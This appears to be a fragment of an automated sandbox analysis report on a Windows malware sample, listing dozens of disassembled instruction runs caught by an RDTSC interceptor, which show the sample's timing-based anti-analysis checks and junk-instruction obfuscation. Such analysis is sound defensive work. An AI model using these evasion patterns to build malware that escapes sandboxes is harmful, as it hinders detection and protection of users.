                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DF6693 second address: DF66AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FC734E5F77Ch 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DF66AC second address: DF66B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DF66B0 second address: DF66E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F77Dh 0x00000007 jmp 00007FC734E5F788h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jnc 00007FC734E5F77Ah 0x00000014 push edx 0x00000015 pop edx 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DF66E3 second address: DF66EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DF66EA second address: DF66F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DF66F0 second address: DF66F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DF69B6 second address: DF69C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F77Bh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DF69C7 second address: DF69CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DF6CFA second address: DF6D1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC734E5F77Ah 0x00000009 jmp 00007FC734E5F77Fh 0x0000000e jl 00007FC734E5F77Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DF6D1F second address: DF6D2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007FC73488208Ch 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DFF3AA second address: DFF3AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DFF3AE second address: DFF3B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DFF3B8 second address: DFF3BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DFF3BC second address: DFF3D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC73488207Ah 0x00000007 jbe 00007FC734882076h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DFE837 second address: DFE866 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push ecx 0x0000000a jno 00007FC734E5F776h 0x00000010 pop ecx 0x00000011 jmp 00007FC734E5F782h 0x00000016 popad 0x00000017 push ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a jnc 00007FC734E5F776h 0x00000020 push esi 0x00000021 pop esi 0x00000022 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DFE9AD second address: DFEA0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FC734882076h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jmp 00007FC734882085h 0x00000010 popad 0x00000011 jmp 00007FC734882088h 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 jmp 00007FC734882081h 0x0000001e jnc 00007FC73488207Eh 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DFEA0C second address: DFEA10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DFEB3F second address: DFEB43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DFEB43 second address: DFEB4B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DFEB4B second address: DFEB63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882082h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DFEB63 second address: DFEB69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DFECB1 second address: DFECB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DFECB7 second address: DFECC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FC734E5F782h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DFECC5 second address: DFECCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DFECCB second address: DFECCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DFECCF second address: DFECE5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC73488207Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007FC734882076h 0x00000010 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DFECE5 second address: DFECE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DFEE3E second address: DFEE42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DFF0F9 second address: DFF0FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E07C99 second address: E07C9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E08426 second address: E0842E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E0842E second address: E08432 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E085A0 second address: E085BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F788h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E085BE second address: E085C3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E08742 second address: E08748 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E08748 second address: E0874E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E103B2 second address: E103D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC734E5F77Dh 0x0000000c jmp 00007FC734E5F77Ah 0x00000011 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E103D0 second address: E103EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882088h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E10687 second address: E10694 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E10694 second address: E10698 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E10698 second address: E1069C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E27D8F second address: E27DA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007FC734882076h 0x00000011 jl 00007FC734882076h 0x00000017 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E27DA6 second address: E27DAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E27DAA second address: E27DBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC73488207Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E27DBB second address: E27DCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC734E5F77Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E2F5D0 second address: E2F5D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E2F5D6 second address: E2F5E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007FC734E5F77Eh 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E3687D second address: E3689E instructions: 0x00000000 rdtsc 0x00000002 js 00007FC734882076h 0x00000008 jmp 00007FC734882087h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E36A09 second address: E36A0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E36A0D second address: E36A11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E36BB2 second address: E36BB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E36BB6 second address: E36BD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC734882085h 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E36BD1 second address: E36BD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E36BD7 second address: E36BDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E3702A second address: E37051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 pushad 0x00000008 jmp 00007FC734E5F781h 0x0000000d push eax 0x0000000e jmp 00007FC734E5F77Bh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E371A2 second address: E371C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FC734882076h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f pop eax 0x00000010 pushad 0x00000011 popad 0x00000012 push esi 0x00000013 pop esi 0x00000014 jmp 00007FC73488207Dh 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E37341 second address: E37349 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E37DC7 second address: E37DE5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jc 00007FC734882076h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop ebx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC73488207Bh 0x00000016 push edx 0x00000017 pop edx 0x00000018 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E37DE5 second address: E37DE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E3BAA5 second address: E3BAB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC73488207Eh 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E3BAB8 second address: E3BAD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC734E5F787h 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51D0829 second address: 51D082F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51D082F second address: 51D0833 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51D0833 second address: 51D08A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 retn 0004h 0x0000000b nop 0x0000000c mov esi, eax 0x0000000e lea eax, dword ptr [ebp-08h] 0x00000011 xor esi, dword ptr [00BE4014h] 0x00000017 push eax 0x00000018 push eax 0x00000019 push eax 0x0000001a lea eax, dword ptr [ebp-10h] 0x0000001d push eax 0x0000001e call 00007FC73948E864h 0x00000023 push FFFFFFFEh 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007FC734E5F789h 0x0000002c adc esi, 63E4B2F6h 0x00000032 jmp 00007FC734E5F781h 0x00000037 popfd 0x00000038 mov dl, al 0x0000003a popad 0x0000003b pop eax 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f mov si, 3BFBh 0x00000043 pushfd 0x00000044 jmp 00007FC734E5F780h 0x00000049 sub ax, D348h 0x0000004e jmp 00007FC734E5F77Bh 0x00000053 popfd 0x00000054 popad 0x00000055 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51D08A1 second address: 51D08A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51D08A7 second address: 51D08EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ret 0x00000009 nop 0x0000000a push eax 0x0000000b call 00007FC73948E8CFh 0x00000010 mov edi, edi 0x00000012 pushad 0x00000013 call 00007FC734E5F77Dh 0x00000018 pushfd 0x00000019 jmp 00007FC734E5F780h 0x0000001e jmp 00007FC734E5F785h 0x00000023 popfd 0x00000024 pop esi 0x00000025 push eax 0x00000026 push edx 0x00000027 push ebx 0x00000028 pop eax 0x00000029 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51D08EC second address: 51D08FA instructions: 0x00000000 rdtsc 0x00000002 mov cl, bh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b mov bx, ax 0x0000000e rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51D08FA second address: 51D090C instructions: 0x00000000 rdtsc 0x00000002 mov eax, 33129F49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, esi 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e mov bh, 85h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51D090C second address: 51D0937 instructions: 0x00000000 rdtsc 0x00000002 mov esi, edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FC73488207Ah 0x00000011 sub eax, 490CFCC8h 0x00000017 jmp 00007FC73488207Bh 0x0000001c popfd 0x0000001d mov ebx, esi 0x0000001f popad 0x00000020 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51D0937 second address: 51D095B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 mov di, 44C2h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC734E5F784h 0x00000015 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51D095B second address: 51D0973 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 mov edi, 476CC470h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov esi, 2BF98D07h 0x00000017 popad 0x00000018 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5180052 second address: 5180058 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5180058 second address: 5180073 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC73488207Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e mov cx, B173h 0x00000012 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5180073 second address: 51800E6 instructions: 0x00000000 rdtsc 0x00000002 call 00007FC734E5F788h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FC734E5F77Bh 0x0000000f popad 0x00000010 and esp, FFFFFFF8h 0x00000013 jmp 00007FC734E5F786h 0x00000018 xchg eax, ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c movsx ebx, si 0x0000001f pushfd 0x00000020 jmp 00007FC734E5F786h 0x00000025 sub esi, 6A769D38h 0x0000002b jmp 00007FC734E5F77Bh 0x00000030 popfd 0x00000031 popad 0x00000032 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51800E6 second address: 5180114 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882089h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FC73488207Ah 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5180114 second address: 5180139 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F781h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC734E5F77Dh 0x00000011 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5180139 second address: 51801A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC734882087h 0x00000008 pushfd 0x00000009 jmp 00007FC734882088h 0x0000000e sub ecx, 666CA6B8h 0x00000014 jmp 00007FC73488207Bh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebx 0x0000001e jmp 00007FC734882086h 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FC73488207Eh 0x0000002b rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51801A9 second address: 51801AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51801AF second address: 51801B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
